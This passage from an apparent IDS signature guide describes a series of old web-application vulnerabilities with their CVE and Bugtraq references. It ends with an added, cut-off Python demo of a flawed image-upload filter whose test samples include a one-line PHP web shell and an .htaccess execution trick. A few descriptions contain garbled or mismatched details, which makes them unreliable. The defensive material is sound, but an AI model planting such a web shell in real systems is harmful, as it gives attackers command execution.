Signature Description: PHP-Nuke is a web-based automated news publishing and content management system based
on PHP and MySQL. The system is fully controlled using a web-based user interface. It is one of the most popular tools
for creating game clan websites. PHP-Nuke (PHP-Nuke versions 5.4 and earlier) could allow a remote attacker to view
internal SQL queries, caused by a vulnerability in the debugging feature in the sql_layer.php script. The sql_layer.php
script contains a debugging feature (sql_debug) which allows users to display information about all SQL queries. An
attacker can use this vulnerability to disclose sensitive information about the database.
Signature ID: 592
SHOUTcast Server buffer overflow vulnerability
Threat Level: Information
Industry ID: CVE-2001-1304 Nessus: 10717
Signature Description: SHOUTcast consists of a client-server model, with each component communicating via a
network protocol that intermingles audio data with metadata such as song titles and the station name. SHOUTcast
Server 1.8.2 is vulnerable to a stack-based buffer overflow via several HTTP requests with a long. A successful exploitation
of this vulnerability allows an attacker to execute arbitrary commands on the vulnerable system. No remedy available
as of September 13, 2008.
Signature ID: 593
Pocsag default 'password' login
Threat Level: Information
Industry ID: CVE-2000-0225 Bugtraq: 1032 Nessus: 10341
Signature Description: POC32 is a program designed to decode POCSAG pager messages captured by scanning the
pager frequencies. These encoded messages are transferred to the computer as an audio signal, then decoded and
displayed by the POC32 software. POC32 2.0 5 is vulnerable to default password access. This vulnerability exists because
the POCSAG POC32 program does not properly prevent remote users from accessing its server port, even if the option has
been disabled. Successful exploitation of this vulnerability allows an attacker to access sensitive information on the
vulnerable system. This issue is fixed in POC32 version 2.0 7. Administrators are advised to update to POC32 2.0
7 or a later version to resolve this issue.
Signature ID: 594
VisualRoute Web Server Detection
Threat Level: Information
Nessus: 10744
Signature Description: VisualRoute is a web-based solution. VisualRoute Server provides a graphical traceroute and
ping test from the server to any other network device. This server allows attackers to perform traceroutes to third-party
hosts without revealing themselves to the target being traced. This rule generates an event when an attacker tries to
determine whether the VisualRoute service is running.
Signature ID: 595
Xerver web server DOS
Threat Level: Information
Industry ID: CVE-2002-0448 Bugtraq: 4254 Nessus: 11015
Signature Description: Xerver is a freely available web server. It runs on any operating system with Java installed,
including Microsoft Windows, Unix/Linux variants, and MacOS. Xerver 2.10 is vulnerable to a denial of service via an
HTTP request containing many "C:/" sequences. This vulnerability is fixed in Xerver 2.20. Administrators are
advised to update to Xerver 2.20 or a later version to resolve this vulnerability.
Signature ID: 600
Neoteris Instant Virtual Extranet Cross Site Scripting Session Hijacking Vulnerability
Threat Level: Information
Industry ID: CVE-2003-0217 Bugtraq: 7510 Nessus: 11608
Signature Description: Neoteris Instant Virtual Extranet (IVE) is an application-based remote access solution that is
accessed via a standard web browser. Instant Virtual Extranet version 3.01 and prior has a cross-site scripting
vulnerability, caused by improper validation of user-supplied input. The issue is triggered when a victim is made to
access the srsrv.cgi script on a web server. Successful exploitation allows an attacker to hijack the victim's
session. This issue is fixed in IVE version 3.1 or later. Administrators are advised to update to the latest version of
IVE (3.1 or later), which is available at the vendor's web site.
Signature ID: 601
WEB-CGI ikonboard.cgi access vulnerability
Threat Level: Information
Bugtraq: 7361 Nessus: 11605
Signature Description: Ikonboard is a web bulletin board software package written in Perl. (A Bulletin Board System
(BBS) is a computer system running software that allows users to connect and log in to the system using a terminal
program; it may be accessible from a dial-up modem, Telnet, or the Internet.) Ikonboard version 3.1.1 is
prone to an arbitrary command execution vulnerability. An attacker can bypass user input validation by inserting illegal
characters into the "lang" value of a user cookie, which could allow the attacker to execute arbitrary code on the
vulnerable system. No remedy is available as of September 2008.
Signature ID: 602
WEB-CGI chipcfg.cgi access vulnerability
Threat Level: Information
Industry ID: CVE-2001-1341 Bugtraq: 2767
Signature Description: The Beck IPC@CHIP is a single-chip embedded web server. The Beck IPC@CHIP ships with a
CGI script named "ChipCfg". IPC@CHIP could allow a remote attacker to obtain sensitive network information. By
default, the chipcfg.cgi script is installed. A remote attacker can send a specially-crafted URL request for the
chipcfg.cgi script to the server to gain access to sensitive network information. No remedy is available as of July
2008.
Signature ID: 603
WEB-CGI album.pl access vulnerability
Threat Level: Information
Industry ID: CVE-2003-1456 Bugtraq: 7444 Nessus: 11581
Signature Description: The Mike Bobbitt Album is a Perl CGI script used for managing pictures on a web server. It
allows you to browse a directory tree and display all the images in it through a customizable web-based interface. Any
new images added are automatically displayed in the photo album. Mike Bobbitt album.pl version 6.1 and
prior has a command execution vulnerability. The vulnerability reportedly exists when alternate configuration files are
used; an attacker can use this vulnerability to execute arbitrary commands on the server and gain local, interactive
access to the underlying host.
Signature ID: 604
WEB-CGI streaming server parse_xml.cgi access vulnerability
Threat Level: Information
Industry ID: CVE-2003-0054 Bugtraq: 6954
Signature Description: The Apple Darwin and QuickTime Streaming Administration Servers are web-based services that
allow administrators to manage the Darwin and QuickTime Streaming Servers. Apple's QuickTime Streaming Server
and Darwin Streaming Server, versions 4.1.1 and 4.1.2, could allow a remote attacker to execute arbitrary commands
on the server. The issue is triggered when an attacker sends a specially-crafted HTTP GET request to parse_xml.cgi
with a CGI parameter value containing a pipe (|) character; an attacker can use this vulnerability to execute arbitrary
commands on the system. No remedy is available for this issue.
Signature ID: 606
BugZilla Post_Bug.CGI Bug Report Spoofing Vulnerability
Threat Level: Information
Industry ID: CVE-2002-0008 Bugtraq: 3794,3793
Signature Description: Bugzilla is a bug or issue-tracking system. Bug-tracking systems allow individual developers or
groups of developers to keep track of outstanding problems with their product effectively. Bugzilla versions before 2.14.1
could allow a remote attacker to post a bug as another user. The issue is triggered when an attacker saves the enter_bug.cgi
form locally and edits the user id; the attacker can post a bug as another user by modifying the reporter parameter of
enter_bug.cgi, which is passed to post_bug.cgi. The issue is fixed in Bugzilla version 2.14.1 or later. Update to this
version to remove the issue; it is available at the vendor's web site.
Signature ID: 607
BugZilla Process_Bug.CGI Comment Spoofing Vulnerability
Threat Level: Information
Industry ID: CVE-2002-0008 Bugtraq: 3793
Signature Description: Bugzilla is a bug or issue-tracking system. Bug-tracking systems allow individual developers or
groups of developers to keep track of outstanding problems with their product effectively. Bugzilla versions before 2.14.1
allow non-authorized users to post comments as any user of their choosing, including non-valid usernames. The
process_bug.cgi script only checks that a user exists when a bug comment is added, not that the user adding the comment is
the one currently logged in. This may be exploited by saving the add-comment form locally and then changing the
value of the appropriate form element. The attacker then submits the altered form. The issue is fixed in Bugzilla
version 2.14.1 or later. Update to this version to remove the issue; it is available at the vendor's web site.
Signature ID: 608
Cobalt RaQ4 Administrative Interface Command Execution Vulnerability
Threat Level: Information
Industry ID: CVE-2002-1361 Bugtraq: 6326 Nessus: 11190
Signature Description: The Cobalt RaQ 4 is a server appliance that provides a dedicated web-hosting platform and
offers new capabilities for high-traffic, complex web sites and e-commerce applications. The Cobalt RaQ 4 server
appliance with the Security Hardening Package (SHP) could allow a remote or local attacker to execute arbitrary
commands on the system, caused by improper validation of the email variable by the overflow.cgi script. The issue
is triggered when an attacker sends arbitrary commands in the email variable using a POST request to the
overflow.cgi script; an attacker can use this vulnerability to execute arbitrary commands on the system.
Signature ID: 609
WEB-CGI smartsearch.cgi access vulnerability
Threat Level: Information
Bugtraq: 7133
Signature Description: Smart Search is a CGI search engine. This is a feature of our digital video recorders that allows
you to search for changes in a particular area of an image. The Smart Search version 4.25.0 "pay-per-click"
search engine software contains a vulnerability that allows code execution using a specially-crafted URL. Using the
"keywords" parameter accepted by smartsearch.cgi, an attacker can pass arbitrary Perl code to the web server, which
will then attempt to execute it.
Signature ID: 610
Access to Moreover.com CGI File cached_feed.cgi vulnerability
Threat Level: Information
Industry ID: CVE-2000-0906 Bugtraq: 1762
Signature Description: The cached_feed CGI supplied by Moreover.com is used to retrieve new headlines from the
Moreover.com site and store them for retrieval and display within your own local web site. Moreover.com
cached_feed version 1.0 has a directory traversal vulnerability. The issue is triggered
when an attacker submits a specially-crafted URL containing "dot dot" (/../) sequences to the cached_feed CGI script;
an attacker can use this vulnerability to read files and directories on the web server. The issue is fixed in
cached_feed version 2.0 or later. Update to this version to remove the issue; it is available at the vendor's web site.
Signature ID: 611
Snitz Forums 2000 Register.ASP SQL Injection Vulnerability
Threat Level: Information
Industry ID: CVE-2003-0286 Bugtraq: 7549 Nessus: 11621
Signature Description: Snitz Forums is an Active Server Pages (ASP) application running on Microsoft Internet
Information Server. Snitz Forums 2000 version 3.3.03 has a SQL injection vulnerability, caused by
improper validation of user-supplied input by the register.asp script. A remote attacker could pass malicious SQL
commands to the register.asp script using the "Email" variable, which would allow the attacker to obtain sensitive
information from the database, modify data, and execute stored procedures.
Signature ID: 612
WEB-IIS MS BizTalk server access vulnerability
Threat Level: Information
Industry ID: CVE-2003-0117 Bugtraq: 7469 Nessus: 11638
Signature Description: Microsoft BizTalk Server is a Microsoft product for business-process automation and application
integration both within and between businesses. Microsoft BizTalk Server 2002 has a buffer overflow vulnerability,
caused by improper bounds checking in the HTTP Receiver component. The HTTP Receiver component is used as an
ISAPI extension for receiving HTTP documents. The issue is triggered when the HTTP Receiver has been enabled: a
remote attacker could send a long string (more than 250 characters) to biztalkhttpreceive.dll in the HTTP Receiver, and
could use this vulnerability to overflow a buffer and execute arbitrary code on the server or crash the IIS server.
The issue is fixed by the appropriate patch, described in Microsoft Security Bulletin MS03-016, which is available at the
vendor's web site.
Signature ID: 613
WEB-IIS Synchrologic Email Accelerator userid list access vulnerability
Threat Level: Information
Nessus: 11657
Signature Description: Microsoft IIS (Internet Information Server) is a group of Internet servers, including a Hypertext
Transfer Protocol service and a File Transfer Protocol service, developed by Microsoft. This event indicates
that an attempt has been made to exploit a weakness in Synchrologic's Email Accelerator application. Synchrologic
is a product that allows remote PDA users to synchronize email, calendar, etc. This rule triggers when an attacker
attempts to access the aggregate.asp page. Successful exploitation of this issue allows an attacker to obtain
the list of users allowed to use the service.
Signature ID: 614
WEB-IIS IISProtect access vulnerability
Threat Level: Information
Bugtraq: 7675,7661 Nessus: 11661
Signature Description: IISProtect is a third-party application that provides password authentication to directories on IIS
using a web-based interface. An attacker can bypass authentication by requesting a specific file with an encoded URI,
and can then proceed to use SQL injection techniques to execute arbitrary code with administrative privileges.
iisProtect 2.2 and iisProtect 2.1 are vulnerable.
Signature ID: 615
WEB-IIS IISProtect globaladmin.asp access vulnerability
Threat Level: Information
Nessus: 11661
Signature Description: IISProtect protects all web site files, including images, databases, HTML and ASP, and protects
directories, user accounts, and complete web administration. It provides authentication, user management, and
membership systems. This rule triggers when an attacker sends a specially-crafted URL request to the
globaladmin.asp page; an attacker can use this vulnerability to gain administrator access to the web server running
IISProtect without needing to authenticate.
Signature ID: 616
WEB-IIS IISProtect siteadmin.asp access vulnerability
Threat Level: Information
Industry ID: CVE-2003-0377 Bugtraq: 7675 Nessus: 11662
Signature Description: IISProtect is a security product for Microsoft Windows that provides authentication-based
access control to protect web resources. It is easy to use and requires no programming, scripting or web development
experience. iisPROTECT version 2.2-r4 has a SQL injection vulnerability, caused by improper filtering of
various variables. A remote attacker could send a specially-crafted URL request to the SiteAdmin.asp script containing
arbitrary SQL code in the 'GroupName' variable; an attacker could use this vulnerability to add, modify, or delete
information in the backend database. No remedy is available as of July 2008.
Signature ID: 617
Microsoft Windows Media Services NSIISlog.DLL Remote Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2003-0349 CVE-2003-0227 Bugtraq: 8035 Nessus: 11664
Signature Description: Microsoft Windows Media Services, a feature of the Microsoft Windows 2000 server, is
designed to deliver media content to clients across a network via multicast media streaming. This service is not
installed by default. A stack-based buffer overflow exists in the ISAPI (Internet Services Application Programming
Interface) nsiislog.dll extension of Internet Information Services (IIS). If the server is configured for Windows
Media Services, a remote attacker could send an overly large POST request to the server to overflow a buffer and cause
IIS to stop responding to legitimate web requests, or execute arbitrary code on the system. Microsoft has addressed this
vulnerability with the updates in MS03-022.
Signature ID: 618
WEB-IIS Battleaxe Forum login.asp vulnerability
Threat Level: Information
Industry ID: CVE-2003-0215 Bugtraq: 7416
Signature Description: The BTTLXE Forum is a web application used for web-based discussion forums.
bttlxeForum version 2.0 beta 3 and earlier has a SQL injection vulnerability, caused by improper
validation of user-supplied input that is used to construct SQL queries. This data may be supplied via the 'password'
field without a user name in the login.asp page. A remote attacker can use this vulnerability to inject malicious data into
SQL queries and gain unauthorized access to the system.
Signature ID: 621
WEB-MISC mod_gzip_status vulnerability
Threat Level: Information
Nessus: 11685
Signature Description: This event indicates that an attempt has been made to ascertain the status of the Apache module
mod_gzip on a host from a source external to the protected network. mod_gzip is used to compress data sent by an
Apache webserver in an attempt to preserve bandwidth and speed up communications between client and server. The
attacker may be trying to gain information on the server by making a query to the mod_gzip_status page. This could
lead to information disclosure which might then be used in further attacks against that host.
Signature ID: 623
WEB-MISC logicworks.ini access Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1383 Bugtraq: 6996 Nessus: 11639
Signature Description: Web-ERP is a complete web-based accounting/ERP system that requires only a web browser
and PDF to use. WEB-ERP versions 0.1.4 and prior could allow a remote attacker to gain access to the
logicworks.ini configuration file. A remote attacker could send a URL request for the logicworks.ini file to obtain
sensitive information, including the username and password for the backend MySQL database. Upgrade to the latest
version of WEB-ERP, available at the vendor's web site.
Signature ID: 624
Philboard philboard_admin.ASP Authentication Bypass Vulnerability
Threat Level: Information
Bugtraq: 7739 Nessus: 11675
Signature Description: Philboard is a freeware forum application implemented in ASP scripts. Philboard version 1.14
and prior could allow a remote attacker to gain unauthorized administrative access to the forum. Philboard stores
authentication settings in cookies called "philboard_admin" and "admin". The issue is triggered when an attacker
sends a specially-crafted HTTP GET request containing the name of the cookie (such as philboard_admin=True and
admin=True); an attacker can use this vulnerability to gain administrative access to the forum, including the backend
database. No remedy is available as of September 2008.
Signature ID: 625
WEB-MISC philboard_admin.asp authentication bypass vulnerability
Threat Level: Information
Bugtraq: 7739 Nessus: 11675
Signature Description: Philboard is a web-based forum implemented using ASP script. Philboard version
1.14 and prior could allow a remote attacker to gain unauthorized administrative access to the forum. This event
indicates that an attempt has been made to exploit a weakness in the Philboard ASP application. By setting a cookie
value to "True", administration rights are granted to that user. The user would then gain control of the application and
have access to all administration functions. This rule generates an event if the attacker makes a request for the
administration page with the cookie "philboard_Admin" value set to true from a source external to the protected
network. No remedy is available as of September 2008.
Signature ID: 626
WEB-MISC philboard.mdb Vulnerability
Threat Level: Warning
Nessus: 11682
Signature Description: Philboard is a freeware forum application implemented in ASP scripts. Philboard version 1.14
and prior could allow a remote attacker to gain unauthorized administrative access to the forum. By default, Philboard
installs the Access database file to database/philboard.mdb on the web server. Without authentication, an attacker can
download this file to access Philboard bulletin board user names, passwords, and message archives. No remedy is
available as of September 2008.
Signature ID: 627
WEB-MISC globals.pl access Vulnerability
Threat Level: Information
Industry ID: CVE-2007-4539 Bugtraq: 25425
Signature Description: Bugzilla is a bug or issue-tracking system. Bug-tracking systems allow individual developers or
groups of developers to keep track of outstanding problems with their product effectively. Bugzilla versions 2.23.3
through 3.0.0 ship with a file called 'globals.pl', containing global variables and other information used by various
Bugzilla components. Among the more sensitive variables stored in this file are the database user name and password.
A user can read this file via a web browser and also obtain sensitive information, caused by insecure
permissions on time-tracking fields in the WebService (XML-RPC) interface.
Signature ID: 628
WEB-MISC lyris.pl access Vulnerability
Threat Level: Information
Industry ID: CVE-2000-0758 Bugtraq: 1584
Signature Description: Lyris ListManager is the world's most popular software for creating, sending, and tracking
highly effective email campaigns, newsletters, and discussion groups. This rule triggers when an attacker sends a
specially-crafted URL request to the lyris.pl script using the variable list_admin. The variable list_admin is used to
identify the user as an administrator; by changing this value from F to T the attacker can identify himself as the mailing
list administrator. An attacker can use this vulnerability to gain sensitive information and obtain administrator access.
The affected versions of Lyris ListManager are 3.0.0 and 4.0.0.
Signature ID: 630
Alibaba CGI post32.exe arbitrary command execution Vulnerability
Threat Level: Information
Bugtraq: 1485
Signature Description: Alibaba is a web server that runs on Windows platforms. This rule triggers when an attacker
sends a specially-crafted URL request to post32.exe with piped commands. Successful exploitation allows
an attacker to execute arbitrary commands on the web server. The affected version of Alibaba is 2.0.0.
Signature ID: 631
WEB-MISC chip.ini access Vulnerability
Threat Level: Information
Industry ID: CVE-2001-0749 Bugtraq: 2775
Signature Description: The Beck IPC@CHIP is a single-chip embedded web server. The web server's root directory is
set to / by default. This could allow a remote attacker to download arbitrary files from any location on the system,
including the chip.ini file, which contains all of the login names and associated passwords for the device. No remedy
is available as of September 2008.
Signature ID: 633
Lotus Domino Dot File Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2003-1408 Bugtraq: 6841
Signature Description: Lotus Domino is a multi-platform application server developed by IBM. Lotus Domino
provides the complete infrastructure needed to create, test, deploy, and manage distributed, multi-lingual applications,
including directory, database, web server, email server and so on, all in one application. Lotus Domino
versions 5.0 and 6.0 could allow a remote attacker to obtain sensitive information. A remote attacker could send a
specially-crafted URL request with a "dot" character appended. This could allow the attacker to view source code and
disclose sensitive information, such as database credentials, embedded in server-side scripts or include files. No remedy
is available as of September 2008.
Signature ID: 634
WEB-MISC Lotus Notes .pl script source download Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1408 Bugtraq: 6841
Signature Description: Lotus Domino is a multi-platform application server developed by IBM. Lotus Domino
provides the complete infrastructure needed to create, test, deploy, and manage distributed, multi-lingual applications,
including directory, database, web server, email server and so on, all in one application. Lotus Domino
versions 5.0 and 6.0 could allow a remote attacker to obtain sensitive information. A remote attacker could send a
specially-crafted URL request for any non-default Lotus file type (such as Perl scripts (".pl")) with a "dot"
character appended. This could allow the attacker to view source code and disclose sensitive information, such as database
credentials, embedded in server-side scripts or include files. No remedy is available as of September 2008.
Signature ID: 635
WEB-MISC Lotus Notes .csp script source download Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1408 Bugtraq: 6841
Signature Description: Lotus Domino is a multi-platform application server developed by IBM. Lotus Domino
provides the complete infrastructure needed to create, test, deploy, and manage distributed, multi-lingual applications,
including directory, database, web server, email server and so on, all in one application. Lotus Domino
versions 5.0 and 6.0 could allow a remote attacker to obtain sensitive information. A remote attacker could send a
specially-crafted URL request for any non-default Lotus file type (such as Crystal Server pages (".csp")) with a
"dot" character appended. This could allow the attacker to view source code and disclose sensitive information, such as
database credentials, embedded in server-side scripts or include files. No remedy is available as of September 2008.
Signature ID: 637
WEB-MISC iPlanet .perf access Vulnerability
Threat Level: Information
Nessus: 11220
Signature Description: iPlanet is Sun Microsystems' solution for a web server and related programs intended to allow
an enterprise to take advantage of the Internet. It uses the file '.perf' to display performance statistics for the server. This
rule triggers when an attacker sends a request for the file '.perf'. Successful exploitation allows an attacker to
access the statistics for the server.
Signature ID: 638
Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
Threat Level: Information
Industry ID: CVE-2003-0042 Bugtraq: 6721 Nessus: 11438
Signature Description: Apache Tomcat is the servlet container that is used in the official reference implementation for
the Java Servlet and JavaServer Pages technologies. Apache Tomcat versions before 3.3.1a could allow a remote
attacker to obtain sensitive information. The issue is triggered when a remote attacker sends an HTTP request
containing null (%00) or backslash (\) characters; an attacker can use this to disclose sensitive information
and also execute malicious Java code on the web server. The issue is fixed in Tomcat version 3.3.1a or later.
Update to this version to remove the issue; it is available at the vendor's web site.
Signature ID: 639
WEB-MISC DB4Web access Vulnerability
Threat Level: Information
Nessus: 11180
Signature Description: DB4Web is an application server used to access various sources of data via a web interface.
DB4Web does not handle the characters ":" and "\" correctly when they are URL encoded. An attacker can use this flaw
to gain access to sensitive system information. The application also does not correctly handle the use of extra "/" in a
URI. It is also possible for the attacker to open arbitrary TCP connections using DB4Web and may be able to use it for
port scanning other hosts.
Signature ID: 640
MondoSearch Source Disclosure Vulnerability
Threat Level: Information
Industry ID: CVE-2002-1528 Bugtraq: 5941 Nessus: 11163
Signature Description: MondoSearch is an advanced, multilingual enterprise search engine. It helps users quickly find
relevant data across the enterprise. MondoSearch fails to sufficiently validate user-supplied requests for .cgi files.
MondoSearch version 4.4 could allow a remote attacker to obtain script source code. The issue is triggered when an
attacker sends a specially-crafted string to 'MsmMask.exe' in the 'mask' parameter; an attacker can use this
vulnerability to view the source code of arbitrary files. No remedy is available as of July 2008.
Signature ID: 642
WEB-MISC helpout.exe access Vulnerability
Threat Level: Information
Industry ID: CVE-2002-1169 Bugtraq: 6002
Signature Description: IBM Web Traffic Express (WTE) is a Web caching proxy server that is included as a
component in the WebSphere Edge Server. WebSphere refers to a brand of IBM software products. It is designed to set
up, operate, and integrate e-business applications across multiple computing platforms using Java-based web
technologies. IBM Web Traffic Express (IBM WebSphere Caching Proxy Server versions 3.6 and 4.0) has a denial of
service vulnerability. A remote attacker could send a malformed HTTP request to the /cgi-bin/helpout.exe script, which
would cause the proxy server (ibmproxy.exe) to crash. Upgrade to the latest version (4.0.1.26 or later), available at the
vendor's website.
Signature ID: 643
WebLogic Server and Express HTTP TRACE Credential Theft Vulnerability
Threat Level: Information
Industry ID: CVE-2004-2320 Bugtraq: 9506,9561,11604 Nessus: 11213
Signature Description: The TRACE method is used when debugging a web server to ensure that the server returns
information to the client correctly. When combined with other vulnerabilities it is possible to use the TRACE method to
return sensitive information from a web server such as authentication data and cookies. This is known as a Cross Site
Tracing (XST) attack. The affected versions are BEA WebLogic Server and Express 8.1 SP2 and earlier, 7.0 SP4 and
earlier, 6.1 through SP6, and 5.1 through SP13.
Signature ID: 644
TtForum remote command execution Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1459 CVE-2003-0331 Bugtraq: 7542,7543 Nessus: 11615
Signature Description: ttForum is a web-based forum implemented in PHP. ttForum/ttCMS (ttCMS 2.2) could allow a
remote attacker to include malicious PHP files. A remote attacker could send a specially-crafted URL request to the
index.php script using the $template variable that specifies a malicious PHP file on a remote system as a parameter; an
attacker can use this vulnerability to execute arbitrary code on the vulnerable system. No remedy is available as of
September 2008.
Signature ID: 645
PHP-Proxima autohtml.php access Vulnerability
Threat Level: Information
Industry ID: CVE-2003-0294 Bugtraq: 7598 Nessus: 11630
Signature Description: PHP-Proxima is a website portal system implemented in PHP. PHP-Proxima version 6.0 could
allow a remote attacker to view known files on the system. By sending a specially-crafted URL request to autohtml.php
that specifies a known file on the system in the '$name' variable, an attacker can access the contents of the targeted
file to obtain sensitive information. No remedy is available as of September 2008.
Signature ID: 647
OmniHTTPd test.php sample cross-site scripting Vulnerability
Threat Level: Information
Industry ID: CVE-2002-1455 Bugtraq: 5568 Nessus: 11617
Signature Description: OmniHTTPd is a powerful all-purpose, industry-compliant web server built specially for
Windows. OmniHTTPd versions below 2.4 have a cross-site scripting vulnerability. A remote attacker
could create a specially-crafted URL request to the test.php script, with script embedded using hexadecimal URL-encoded
characters, pointing at one of the sample pages; once the link is clicked, the attacker can use this vulnerability to steal
cookies or perform other web-based attacks. No remedy is available as of September 2008.
Signature ID: 649
TtCMS Header.PHP Remote File Include Vulnerability
Threat Level: Information
Industry ID: CVE-2003-0320 Bugtraq: 7625
Signature Description: ttCMS is a PHP-based content management system that fully supports MySQL. ttCMS
version 2.3 and prior could allow a remote attacker to include malicious PHP files. A remote attacker could send a
specially-crafted URL request to the header.php script using the ?admin_root variable that specifies a malicious PHP
file on a remote system as a parameter; an attacker can use this vulnerability to execute arbitrary code on the vulnerable
system. No remedy is available as of September 2008.
Signature ID: 650
Turba status.php access vulnerability
Threat Level: Information
Bugtraq: 7622 Nessus: 11646
Signature Description: This event indicates that an attempt has been made to exploit potential weaknesses in PHP
applications. The Turba module of Horde (Horde version 2.1) allows a user to request the status.php file, which
may disclose valuable information about the host and the application. The attacker may be trying to gain information
on the PHP implementation on the host; this may be the prelude to an attack against that host using that information. No
remedy is available as of September 2008.
Signature ID: 651
BLNews objects.inc.php4 PHP file include Vulnerability
Threat Level: Information
Industry ID: CVE-2003-0394 Bugtraq: 7677 Nessus: 11647
Signature Description: BLNews is a web-based news application written in PHP. BLNews version 2.1.3 allows a remote attacker to include malicious PHP files. A remote attacker can send a specially-crafted URL request to the objects.inc.php4 script in which the $server variable points at a copy of the tools.inc.php4 or cmd.php4 script on a remote system; the attacker can exploit this vulnerability to make the server fetch and execute arbitrary PHP code with the privileges of the web server. No remedy available as of September, 2008.
Signature ID: 653
WEB-PHP TextPortal admin.php default password (12345)
Threat Level: Information
Bugtraq: 7673 Nessus: 11660
Signature Description: TextPortal is a text-based PHP portal system with a forum, voting, user registration and other features. TextPortal version 0.8 and prior could allow a remote attacker to gain unauthorized access. TextPortal hashes passwords with crypt and stores them in the 'db_ures\admin_pass.php' file. Specifically, TextPortal uses '12345' as the default password for the 'god2' user account. If the administrator fails to change the default password of the 'god2' account, a remote attacker can send a specially-crafted URL to the admin.php script and gain unauthorized access to TextPortal. No remedy available as of September, 2008. This rule triggers when the default password '12345' is submitted.
Signature ID: 654
TextPortal Undocumented Username / Password Weakness
Threat Level: Information
Bugtraq: 7673 Nessus: 11660
Signature Description: TextPortal is a text-based PHP portal system with a forum, voting, user registration and other features. TextPortal version 0.8 and prior could allow a remote attacker to gain unauthorized access. TextPortal hashes passwords with crypt and stores them in the 'db_ures\admin_pass.php' file. Specifically, TextPortal uses '12345' as the default password for the 'god2' user account. If the administrator fails to change the default password of the 'god2' account, a remote attacker can send a specially-crafted URL to the admin.php script and gain unauthorized access to TextPortal. No remedy available as of September, 2008.
Signature ID: 656
Cafelog gm-2-b2.php remote command execution vulnerability
Threat Level: Information
Bugtraq: 7738 Nessus: 11667
Signature Description: The CafeLog b2 weblog tool allows users to generate new pages and weblogs dynamically. b2 version 0.6.1 allows a remote attacker to include malicious PHP files. A remote attacker can send a specially-crafted URL request to the gm-2-b2.php script in the b2-tools directory in which the $b2inc variable names a PHP file on a remote system; the attacker may exploit this vulnerability to execute arbitrary code on the vulnerable system. No remedy available as of September, 2008.
Signature ID: 658
Webfroot Shoutbox URI Parameter File Disclosure Vulnerability
Threat Level: Information
Bugtraq: 7737 Nessus: 11668
Signature Description: Webfroot Shoutbox is a web application that lets site visitors leave messages quickly and easily. Webfroot Shoutbox version 2.32 and prior is prone to directory traversal. A remote attacker can send a specially-crafted URL request to the shoutbox.php script with 'dot dot' sequences (../) in the $conf variable to step out of the intended directory, and can thereby read any file the web server process can access. No remedy available as of September, 2008.
Signature ID: 659
WEB-PHP p-news.php access vulnerability
Threat Level: Information
Industry ID: CVE-2006-5434 Bugtraq: 20569 Nessus: 11669
Signature Description: P-News version 1.16 and prior is prone to a remote file-include vulnerability. A remote attacker can send a specially-crafted URL request to the p-news.php script in which the pn_lang parameter names a file on a remote system. An attacker can use this vulnerability to execute arbitrary server-side script code on the affected computer with the privileges of the web server process. No remedy available as of September, 2008.
Signature ID: 661
Mambo upload.php access vulnerability
Threat Level: Information
Bugtraq: 6572 Nessus: 16315
Signature Description: Mambo is a Content Management System (CMS): the engine behind a web site that simplifies the creation, management, and sharing of content. Mambo Site Server version 4.0.12b and prior could allow a remote attacker to upload malicious PHP files. A remote attacker can send a specially-crafted request containing a malicious PHP file to the upload.php script. Specifically, the script only checks whether an allowed image extension, such as '.jpg' or '.gif', appears somewhere in the file name rather than at its end, so any file whose name contains an allowed extension may be uploaded. Uploaded files are stored in the 'images/stories' directory on the system. An attacker can exploit this vulnerability to upload malicious applications to the vulnerable system. No remedy available as of July, 2008.
Signature ID: 662
Mambo uploadimage.php access vulnerability
Threat Level: Information
Bugtraq: 6572 Nessus: 16315
Signature Description: Mambo is a Content Management System (CMS): the engine behind a web site that simplifies the creation, management, and sharing of content. Mambo Site Server version 4.0.12b and prior could allow a remote attacker to upload malicious PHP files. A remote attacker can send a specially-crafted request containing a malicious PHP file to the uploadimage.php script. Specifically, the script only checks whether an allowed image extension, such as '.jpg' or '.gif', appears somewhere in the file name rather than at its end, so any file whose name contains an allowed extension may be uploaded. Uploaded files are stored in the 'images/stories' directory on the system. An attacker can exploit this vulnerability to upload malicious applications to the vulnerable system. No remedy available as of July, 2008.
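The following is an added illustration for signatures 661 and 662, not Mambo's code and not part of this guide: a substring extension check of the kind the descriptions above attribute to upload.php and uploadimage.php, beside a check that looks at the last extension and the file's leading bytes. The file names and byte strings are constructed for the demonstration.

```python
"""Added example: why a substring test on the file name lets PHP through an
image upload, and a check that does not.  Not Mambo's code; samples are
constructed."""
import os

ALLOWED_EXT = (".jpg", ".jpeg", ".gif", ".png")

# Leading bytes each allowed image type must carry.
MAGIC = {
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif":  (b"GIF87a", b"GIF89a"),
    ".png":  (b"\x89PNG\r\n\x1a\n",),
}


def upload_check_vulnerable(filename):
    """Mimics the described behaviour: an allowed extension anywhere in the
    name passes, so 'shell.jpg.php' is accepted and later served as PHP."""
    lowered = filename.lower()
    return any(ext in lowered for ext in ALLOWED_EXT)


def upload_check_fixed(filename, content):
    """Accept only when (1) the name has no path component, (2) the *last*
    extension is an image type, (3) there is no second extension a web
    server might execute, and (4) the bytes start with that type's magic."""
    base = os.path.basename(filename.replace("\\", "/"))
    if base != filename or base.startswith("."):
        return False
    root, ext = os.path.splitext(base.lower())
    if ext not in ALLOWED_EXT or not root:
        return False
    if os.path.splitext(root)[1]:        # e.g. shell.php.jpg
        return False
    return any(content.startswith(m) for m in MAGIC[ext])


# Constructed uploads: (name, first bytes of the content).
SAMPLES = [
    ("photo.jpg",     b"\xff\xd8\xff\xe0" + b"\x00" * 12),
    ("logo.gif",      b"GIF89a" + b"\x00" * 12),
    ("shell.jpg.php", b"<?php system($_GET['c']); ?>"),
    ("shell.php.jpg", b"<?php system($_GET['c']); ?>"),
    ("evil.jpg",      b"<?php system($_GET['c']); ?>"),
    ("../.htaccess",  b"AddType application/x-httpd-php .jpg"),
]


def compare(samples=SAMPLES):
    """Map each file name to (vulnerable verdict, fixed verdict)."""
    return {name: (upload_check_vulnerable(name), upload_check_fixed(name, data))
            for name, data in samples}


if __name__ == "__main__":
    for name, (vuln, fixed) in compare().items():
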